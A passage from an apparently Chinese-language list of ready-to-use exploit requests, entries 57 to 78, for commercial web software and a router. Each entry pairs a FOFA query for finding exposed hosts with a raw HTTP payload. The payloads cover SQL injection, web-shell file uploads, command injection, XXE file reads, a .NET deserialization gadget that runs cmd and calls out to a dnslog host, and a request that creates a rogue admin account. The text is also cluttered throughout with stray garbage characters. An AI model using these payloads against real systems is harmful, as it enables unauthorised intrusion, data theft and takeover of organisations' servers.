2 z9 X6 [/ h3 b: Z# `4 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
: b- x, W5 v1 ^. X3 qContent-Type: application/json
& c7 ]& e; r) i6 {: F) C" h( E( K5 E% I
{0 W$ V, z9 b1 D: [
"storeID":{
+ e# |1 l4 Y& ^; t "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
( k2 C4 e7 N, S# p+ H1 x, e' m "MethodName":"Start",; a9 N( K0 m+ G2 ^
"ObjectInstance":{
S" q% c/ n! X: y: b0 K' M" A4 H; w "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- S# L& s9 W5 ] "StartInfo": {
) A+ p9 k/ o; o$ O: S7 I& r: \ M "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' ?2 M- G( j% i- L& N( ~ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
. E$ ^5 v: }4 M# T3 B2 C* ^" ` }- ~& o3 Y& P6 r; s+ ^* X
}1 y+ @- j; b, x8 }2 {
}& x, e2 w+ K9 [& w3 C$ e" M
}! D9 O& {) F+ S1 p! j
1 }' y" f1 J' t) h
/ X7 _6 L+ a$ q! c57. 畅捷通T+ keyEdit.aspx SQL注入1 c/ E; x2 X5 l2 h: Q2 E+ }
FOFA:app="畅捷通-TPlus"
6 U8 t* d. F% EGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
J' w5 Y$ L \0 `1 i7 oHost: host
2 K! P* n; ]; O3 l; E$ jUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ H* T3 S' A0 ^' f; `7 y' ]& U
Accept-Charset: utf-81 p8 `7 V2 y4 Y, @2 f6 X0 q
Accept-Encoding: gzip, deflate9 R" m& A' }* I; l
Connection: close
5 v* }! l7 I! O8 @! o+ `* \; p' e. t! ^5 d% [8 f
" Q6 a; d- c- z$ E# S58. 畅捷通T+ KeyInfoList.aspx sql注入
' s' ^- ?* ]' }! }FOFA:app="畅捷通-TPlus"
$ K7 o% n8 x# S( Z: N! W7 [' }$ {GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
) T0 e# L" Z9 V8 S1 n! MHost: your-ip; c5 ]( m& y9 H5 i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 Y0 |, K9 o' N) {1 {
Accept-Charset: utf-8
( d6 G9 @; A& s! P+ QAccept-Encoding: gzip, deflate
; S8 C- Z4 x) P4 uConnection: close& Y' p6 i1 `1 e" x8 D
; r$ E9 I( {) u2 X b- {+ ?& A, D
2 Z$ F" v6 z' c8 _! W Q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行' e9 |+ K! v% v( P% t1 `+ C) G" ]
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
4 u4 Z- p0 m7 K0 o( C+ X( h& mPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
8 E* ?6 H) U0 i' G, n/ wHost: 192.168.86.128:9090* A" w$ S3 ]# b U2 U; a
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.369 L4 T" y" W6 `5 A
Connection: close
! t3 ~; f# O8 f( ?4 XContent-Length: 1669
/ q$ O. Q) S1 R! x8 oAccept: */*
" ~* c: q" U' A' {* |$ h" JAccept-Language: en+ x$ S6 M8 o. u$ U5 p) k Z5 @ g
Content-Type: application/x-www-form-urlencoded% \( ?8 f$ s: Y7 w
Accept-Encoding: gzip
, W3 u: ]8 ?8 {7 @2 U1 N4 K/ L* s
PAYLOAD/ s% u1 Y% R+ Q8 X
5 R- Q2 g* o. s2 M7 s/ N; {# n
& ^- X" A7 v" k! k7 A60. 百卓Smart管理平台 importexport.php SQL注入
2 Q, G! P5 E6 Y5 i# b9 j+ ]$ s% fFOFA:title="Smart管理平台"
0 x: R7 c; j; m0 [0 lGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1* |/ F& q5 v8 z1 |
Host:1 k0 e0 ^. S6 W% _" X7 |# R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 R0 W! u6 s) J( a9 S9 A' zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 v, c' ^. J% ^- o% t& N3 j" NAccept-Encoding: gzip, deflate p0 n, x5 z/ \5 L) S3 u
Accept-Language: zh-CN,zh;q=0.9
, |% [) v9 I6 ]5 e9 O8 s0 B6 ~* v1 |Connection: close
: f, P2 g1 }+ U, k" u' G: I, y* `! w$ G- ]9 ^: I* H
0 ?$ t* p$ C& j1 M7 C
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
1 }" a7 S$ [- S9 W7 f! N% SFOFA: title="欢迎使用浙大恩特客户资源管理系统"
# M9 q* y0 Z8 c2 K K5 }2 hPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
2 K. I; {9 F$ xHost: x.x.x.x: O# b/ m8 d0 r7 }- X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: _0 q- ]' B" b8 S: r8 @6 YConnection: close
# V% O$ V# O' m: U' y$ C8 E: [& e7 eContent-Length: 27
% I V, D7 l2 w. O. IAccept: */*
9 B) ^' w# D# }6 O+ u x EAccept-Encoding: gzip, deflate8 {9 C, N# ~: @8 Z" S5 N* g
Accept-Language: en) E. t0 k2 T: l
Content-Type: application/x-www-form-urlencoded5 M% ?( _4 a, F6 A
- P2 V7 {, k- F5 @) a+ q9 a& k7 `8uxssX66eqrqtKObcVa0kid98xa
c1 X0 f7 V# j4 q+ L. I" I/ p, `# T) \0 I" L
& F7 a9 O7 Z! C5 }7 }
62. IP-guard WebServer 远程命令执行
& v' P: e$ t& W- F. d9 d8 TFOFA:"IP-guard" && icon_hash="2030860561"$ T% y1 y5 O! s- l7 p
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.12 d, |# r7 E# j3 h
Host: x.x.x.x9 W1 x2 W( v* X; C
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
3 |9 Z2 Z& I- S: x9 o# U1 u2 cConnection: close/ @1 g5 X0 p' n& @3 P/ j
Accept: */*. A& I e2 B% {) n2 J3 t I
Accept-Language: en, L: h! S. B3 L5 o, p! _
Accept-Encoding: gzip
# b* p6 Y8 O1 Z( g$ n2 } p: r& L8 ~) @( K+ _1 E1 k
4 P. o/ @; P; M% {1 o0 H, J9 o5 _
访问8 @: m. J' I5 r
" E! }4 X' z. Q. l7 x' N, W
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
2 F$ O2 I- S+ t9 u3 R7 Q3 }6 [Host: x.x.x.x; \" Q* Y) h; G+ Q9 f3 X- W7 U
% L }/ F1 [. O) J4 n1 ]3 _
" z' r7 k: _! Y9 F; t, T6 i3 h6 p63. IP-guard WebServer任意文件读取4 e6 d5 Q& i4 r/ n1 ^( Y
IP-guard < 4.82.0609.0
: I/ H: E+ q/ B& J8 x$ Y' g5 DFOFA:icon_hash="2030860561"
" B1 U' E% X+ S0 {4 yPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
' z; m' k/ F1 }# A3 S9 z1 KHost: your-ip
. L% _9 p1 U7 W! LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 k* d2 g! x% [: x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- p! I: `$ ]# G5 ?6 o
Accept-Encoding: gzip, deflate
: c1 q' E* e' h6 `1 t. i7 BAccept-Language: zh-CN,zh;q=0.9" z7 P: R/ c3 N; W9 y* D. X
Connection: close
1 V4 f* o) J! R" d1 h4 u: D6 ~Content-Type: application/x-www-form-urlencoded
9 j. Y4 ?1 b8 j- y8 h0 m
9 X `: M, E- i: @4 }path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A; @) l- @; H1 B6 Y( w. x0 t% o
: T7 ^* [ l% ~+ Q" F$ H
64. 捷诚管理信息系统CWSFinanceCommon SQL注入9 Q4 t5 _( z' s4 n) Y7 M
FOFA:body="/Scripts/EnjoyMsg.js"
/ \. w) s$ y! R8 G( s2 PPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
; _3 q3 ]+ y- {) _6 j6 cHost: 192.168.86.128:9001
9 A. R. b9 X* f8 B' Y' M3 e. {User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
. e3 J" d! P5 Y$ Z9 Y9 g) X( F$ C; bConnection: close1 l5 K* d6 A* @+ Z
Content-Length: 369
) I! U P/ N; ]Accept: */*5 a' F6 \3 c1 O* U
Accept-Language: en
$ H$ x' M* j) [ [! l) A/ }/ uContent-Type: text/xml; charset=utf-8/ w7 C. s* c& q2 s: c
Accept-Encoding: gzip" B" W/ d, G! X, u7 M
- u0 F4 R# |+ P% X3 x N- v
<?xml version="1.0" encoding="utf-8"?> {, {( R2 [: M$ x- G
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 {# E) @1 p0 h2 }3 k/ }<soap:Body>4 D; _3 D/ U8 b2 p
<GetOSpById xmlns="http://tempuri.org/">" |. d% K6 ] d6 [3 J8 S
<sId>1';waitfor delay '0:0:5'--+</sId>3 D8 |& C! o1 {1 W0 f
</GetOSpById>$ J6 K- p* b: l8 |& e) ^' s
</soap:Body>4 g3 [" w' P9 v$ h: J
</soap:Envelope>
7 W6 q( x4 G6 G3 b2 y- G
7 G2 k# }3 t. ^1 A: M7 R+ x
& K: G8 \3 N/ ?65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过- ~& B' ^$ f% S8 s$ v+ n
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"8 a' P8 |" a$ k, @. a
响应200即成功创建账号test123456/123456: m- A9 h4 @8 n+ [ a/ _) R7 C6 U5 w8 ~
POST /SystemMng.ashx HTTP/1.1
. X! x2 A0 S, Z/ b1 V7 G9 o$ M7 ^Host:) V8 U Q- q+ E i* D e" f, v: [
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)0 F+ @ [6 F) Y, @
Accept-Encoding: gzip, deflate) p) x4 V! `* B: i0 W
Accept: */*! t7 d8 G1 e# }6 `% B2 r6 d6 a) V6 w
Connection: close
1 E3 z C# ^# U1 Q! |. N3 e9 iAccept-Language: en( P1 }& [3 X( X& N3 ~' q! W: F% A& j
Content-Length: 174" L+ I6 _' M4 @ B: |. o
$ i3 B5 l; E" Q3 Q9 u4 C: r
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators. Z) a. z0 f1 A
$ K' Y7 z% P" y: M' z" Y3 O0 _" |' X5 t: R) [( O5 @
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入) }3 j. c5 B% f, ~
FOFA:app="万户ezOFFICE协同管理平台"$ f/ s. s( Q2 D0 R! s4 y
7 W" J( E3 Y5 s& R5 rGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1, o8 R1 B, \/ o0 W# u0 x
Host: x.x.x.x" u+ h- M! g3 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. n( `& k- d% i+ H
Connection: close. r5 H& b* o; j- B4 j' @. M
Accept: */*
1 C* C! d0 U$ f& MAccept-Language: en
9 D5 ^# B0 ^: M. l F" w+ u, IAccept-Encoding: gzip0 F8 K8 [, q' J$ z9 x9 n0 a/ B* f
0 V7 b+ y4 z' k3 ?5 s
% q4 p- m5 Z7 a; X第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在 J6 k+ D1 b" A
( x4 v4 d8 n8 |# y( ~! D4 |. i
67. 万户ezOFFICE wpsservlet任意文件上传
0 W8 w) r D0 \# W9 Z# u3 x( oFOFA:app="万户网络-ezOFFICE": A& s q* P# A+ Y' E& C
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
# e) u: P# L F% z1 c% jPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
0 r1 U! u+ M/ |; K# QHost: x.x.x.x
0 D/ H) ^& ]6 u* Z6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" x+ ]9 h4 c6 ^: \; E# m. O
Content-Length: 173
- @8 g; ?$ k$ E; @' _5 o0 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
3 b5 x; Z% r, ?. [Accept-Encoding: gzip, deflate
2 G- }& Z0 f3 ?, i9 ]; `4 nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
: d' @5 q2 e# ^' R) ?( yConnection: close1 }1 O0 T' C# J+ O/ `" b
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp g% t# z; j! {) C; \! f+ g
DNT: 1- U) U9 M. E2 u0 E% V
Upgrade-Insecure-Requests: 1" q1 z( U ]8 V8 ~
9 P& u3 G1 L" m* x% A--ufuadpxathqvxfqnuyuqaozvseiueerp
. Q; Q# T: O1 `2 xContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"% I) O. s: x3 S6 A- n
( N$ O& a" V! M" K* Q( x/ u8 a. S
<% out.print("sasdfghjkj");%> M% B+ Q& M( @) p; q
--ufuadpxathqvxfqnuyuqaozvseiueerp--
2 G+ }* A6 v4 p' x$ I2 c! |
; F' y5 [& S" N. g- }2 j: K* b6 e F: H
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp: ^7 t: K V) m e3 a
) f& I/ K+ Q- h9 e( G
68. 万户ezOFFICE wf_printnum.jsp SQL注入) M& G) v& r' P u: {
FOFA:app="万户ezOFFICE协同管理平台") N- g- Y9 h2 i
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.12 b6 Y2 ]% ]1 \
Host: {{host}}3 t& _" q# W2 Q; g4 `9 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
8 G5 j( e- P; ~7 SAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
8 {) e/ l2 h8 m; i! GAccept-Encoding: gzip, deflate
; x# B9 Y R7 ZAccept-Language: zh-CN,zh;q=0.9( J: c- Y+ X" _ {
Connection: close
; w8 D& ~5 S) ]0 Z
2 j( s! n6 Y4 w" `4 }" V3 d1 l& \) ~2 g
69. 万户 ezOFFICE contract_gd.jsp SQL注入# M+ z0 |) o7 k- _. V* F1 p
FOFA:app="万户ezOFFICE协同管理平台"
, I' F* k2 f% s" `6 x% HGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1) i; q; E( h1 v7 l
Host: your-ip3 @: N) K) s9 U' t' a% {/ l
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, {/ q, k4 f3 ?, j, vAccept-Encoding: gzip, deflate! d& V* j9 T6 W/ F
Accept: */*( c- |* b: o8 T* R3 [
Connection: keep-alive
0 h2 r2 g! U) n) M; R
+ w4 y- l0 k, F; J
9 _( t; O: n Z9 R5 ?70. 万户ezEIP success 命令执行
" M3 c8 Q& i! R7 ?4 w+ [& m2 nFOFA:app="万户网络-ezEIP"( T( L8 p) @* j" z w, X" K+ T- P
POST /member/success.aspx HTTP/1.1
' q; f1 _9 ~8 Y: C( T9 v2 hHost: {{Hostname}}
. s3 Y+ m, B# {8 d# jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36/ M7 U) Y$ m: P. X0 P: [5 D
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
# Q# i/ F# }- O6 D8 V# i3 YContent-Type: application/x-www-form-urlencoded: D4 c6 a l/ s Y
TYPE: C
0 x# l7 ^! y, O/ D$ uContent-Length: 16702* W4 C/ u" C7 p ?# G& {, U' l3 l
4 l/ M3 p2 z/ p* | `7 p
__VIEWSTATE=PAYLOAD
% @& j" ?, b/ M0 j p/ p6 S v8 i7 p$ b4 f
, O, _- }- I7 C, i! Z/ l7 o
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
3 e/ H! S9 v# `) JFOFA:body="PM2项目管理系统BS版增强工具.zip"
! K& {) V7 [& U* E* Q% RGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1& L! C9 o# U; k. W
Host: x.x.x.xx.x.x.x; O i6 l4 E7 V6 I1 I% k8 n, ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 ]3 V j1 N$ x8 wConnection: close
" c( V$ u8 v' N4 G5 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, T- o0 R- U% `8 TAccept-Encoding: gzip, deflate2 ^8 ~' ^# m: Z2 r! |8 {- i: ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 u+ x7 c% i) T9 Y/ x% D/ D9 J
Upgrade-Insecure-Requests: 1
f8 G! F s, u/ A+ i# j4 P( `$ F& U
' x/ f9 K0 h3 @72. 致远OA getAjaxDataServlet XXE
- v" o% U% m& I$ e+ c0 m5 bFOFA:app="致远互联-OA": n, i$ ]0 n+ j8 k% a. A
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1" z h W7 T0 |+ G; w) A8 L
Host: 192.168.40.131:8099# ~' Y0 }4 ^; B3 n+ i) B( w
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36* a+ d' e: K( R" E: H
Connection: close
9 B; Q' C- \) Y8 a$ f* }; R: eContent-Length: 583
7 b( v: x, t, f4 E7 I9 e' T( \Content-Type: application/x-www-form-urlencoded1 R; G' b, |9 W6 X% W6 w3 S9 c
Accept-Encoding: gzip
/ ^$ l5 x7 d! I2 G Q5 N+ V$ Y& J
7 w' G' z/ A7 A8 y9 B* l. |S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E2 K, `7 \& Z; F5 b3 Z4 T+ G5 ?
# ~. Q) i) S+ B7 M( I
; K' K( s- L' ?6 R4 \73. GeoServer wms远程代码执行) G& [* z3 e: _$ q
FOFA:icon_hash=”97540678”
$ x9 J5 ?' _. ]6 PPOST /geoserver/wms HTTP/1.1
4 L% g) F$ [2 qHost:$ M* |0 Z" Y* Z K" n) o$ k$ R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) e8 X& T7 {$ V' j; S l3 G: [
Content-Length: 1981
, k+ K) [ \) x$ qAccept-Encoding: gzip, deflate
2 K5 @4 q) R' S6 ^; t n& b" [3 `Connection: close0 M+ u' o* M! H# o* M+ [4 w- c0 \
Content-Type: application/xml, J7 x! R& j' g$ q
SL-CE-SUID: 3
- M7 ]! w6 U( C, \ X) \1 u# y' q/ q3 |5 T a; ~5 _
PAYLOAD
* V! ]' [' c/ D! L: T: X! ?1 N* U% g- |( ?
% N4 l5 U9 P2 v; a5 T- Y! H0 P5 j
74. 致远M3-server 6_1sp1 反序列化RCE1 e: @, e: q3 v C' e. g0 Y
FOFA:title="M3-Server"
6 b/ G) Q( w& b+ b* KPAYLOAD( e7 T4 @- Y4 F6 P1 y
4 u9 u# [/ P5 ]8 _+ {+ f. `75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE' f+ r( b3 z3 w* _/ M
FOFA:app="TELESQUARE-TLR-2005KSH"
) e. o5 r& ` s# y9 B% m$ J XGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1% D; G# k7 V: Y% q% u
Host: x.x.x.x+ j) [3 ~7 ]% j X R( ~& d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 {3 W, y9 J+ p r- b H
Connection: close q6 l9 Z1 ~! N9 a9 q; g* q
Accept: */*; P8 ^- O0 @8 _' d4 W: y
Accept-Language: en
" W/ E4 p0 O" j$ ?# ?% z+ h+ FAccept-Encoding: gzip& u# i, y" M5 U4 y( W: G' Q
. x" R) v" x& M. W( F5 i5 k% @! J
0 g& l2 F, B3 O; o+ @: l* RGET /cgi-bin/test28256.txt HTTP/1.1
5 ^8 V$ l* O" f9 a# W# V& d# BHost: x.x.x.x
8 X- B% p4 N1 y5 o- w1 q
" T2 A$ F$ n' C7 T+ @% z% I" p. ?
76. 新开普掌上校园服务管理平台service.action远程命令执行8 E& i$ Y0 z; Q1 P W+ m
FOFA:title="掌上校园服务管理平台"( S& \5 L- T* E/ A8 E
POST /service_transport/service.action HTTP/1.12 Z; _* m* M' j% f
Host: x.x.x.x) u& D5 t" u8 c/ p1 e" g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.09 F; \- x! e4 |7 g3 w
Connection: close5 n v4 ?& l$ o9 M! R
Content-Length: 211
8 [$ {1 \1 m# ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 E9 ^9 {" ]" t! k! a
Accept-Encoding: gzip, deflate
4 |8 O1 }5 T/ Z" B+ S) pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% i# F8 l& R) _5 _9 fCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
6 O! j3 c+ ?. EUpgrade-Insecure-Requests: 1* g/ W( e- y3 t
5 F" P6 E6 K5 `7 P$ q& ]/ y& |0 y2 l
{$ L. {7 m: z; U* y* C
"command": "GetFZinfo",
9 I0 [2 o+ p( c* H "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"/ n# y. N" N) m1 h, p
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"5 a7 T4 I( r4 o, J
}
2 y$ g: ` p7 e! v8 h- d
! S$ |: J% l, k; ^/ N$ f* k, @; H0 V
' `8 {3 ?$ t# r1 qGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
i% w6 v, G: j9 w5 y5 GHost: x.x.x.x
4 i7 D; A; d" b- j b( A# J# m8 z
/ N+ ?; d- v3 P- ?5 |: d8 L; H+ |+ h/ i, z3 `& }4 V
; m' D) H+ v- W# t. x
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
' [' v; F0 \- v; B) L5 \FOFA:body="F22WEB登陆"- R9 y0 x; a* f% R
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.11 m5 @8 m0 c; P8 Q
Host: x.x.x.x
" P6 N- D A S& ]# O' p1 }* z" AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* \& x0 D& Z( ]) U& W- n6 r" |
Connection: close' J1 O+ F# |/ a' \
Content-Length: 433
, v' Q* @% s5 @. z% B# GAccept: */*
# R: u1 s2 r# T# pAccept-Encoding: gzip, deflate& n8 L$ C2 w+ Z" n
Accept-Language: zh-CN,zh;q=0.9
! H ~+ k1 t/ q' v1 O2 |+ FContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix% {0 R" C' w9 V7 x
- H5 e8 D- Y, N; M+ C: u------------398jnjVTTlDVXHlE7yYnfwBoix5 Y* e, u, [5 Q6 e: u/ I- N
Content-Disposition: form-data; name="folder"0 b0 q: W* w* Q6 N8 R0 ?" r% T( B
; I/ n' \5 ?/ O; G
/upload/udplog
* b6 N0 q- R2 C$ E, Q------------398jnjVTTlDVXHlE7yYnfwBoix
+ M% { R3 r3 X8 |Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
+ t5 `" R# m0 f& {$ i+ r, aContent-Type: application/octet-stream
- S: G/ L1 }8 o7 w' X8 C+ \) U5 }! ~1 `% }7 S8 {& i9 n
hello1234567# m8 E) n3 I7 J; d" i$ |: T& @* ^
------------398jnjVTTlDVXHlE7yYnfwBoix; j4 P. f: T3 S, {. p$ v# S) J
Content-Disposition: form-data; name="Upload"
# _+ T+ c6 f! D2 k: N6 v
; ?! H1 K6 P. _" o3 g8 C: S& aSubmit Query7 T# \6 `0 l+ L5 K \ @
------------398jnjVTTlDVXHlE7yYnfwBoix--9 c, o0 {# s/ A" R0 d
3 o2 [2 u* f( s
3 F9 b# [' f, \5 \/ z/ E1 w
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
E8 x6 D1 |% F+ s) [8 }% m. mFOFA:icon_hash="2001627082"
( b. ]$ Y% O; e8 R4 KPOST /Platform/System/FileUpload.ashx HTTP/1.1% T+ F2 b( N8 r2 z# L
Host: x.x.x.x2 Z- `& E' N/ _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 C* \6 P; i" SConnection: close
" K: S* S( g5 N, H) OContent-Length: 336* d; x" O# A# |4 S+ U, j# v1 J& ?
Accept-Encoding: gzip
8 }2 W% |/ S9 ~1 xContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
* C: P: {" \( i
) ~# c) b& t4 h------YsOxWxSvj1KyZow1PTsh98fdu6l- j8 v9 D) k8 t9 |, I& W/ u
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"/ d$ Y8 n0 N, \0 u/ e" J
Content-Type: image/png
# y" o' H" K$ g/ G9 Z' t2 ~# s
, {1 H4 c' I# |6 \! |9 UYsOxWxSvj1KyZow1PTsh98fdu6l+ @9 y2 C" _: d
------YsOxWxSvj1KyZow1PTsh98fdu6l
Z2 e& H$ I H5 J% @9 dContent-Disposition: form-data; name="target"
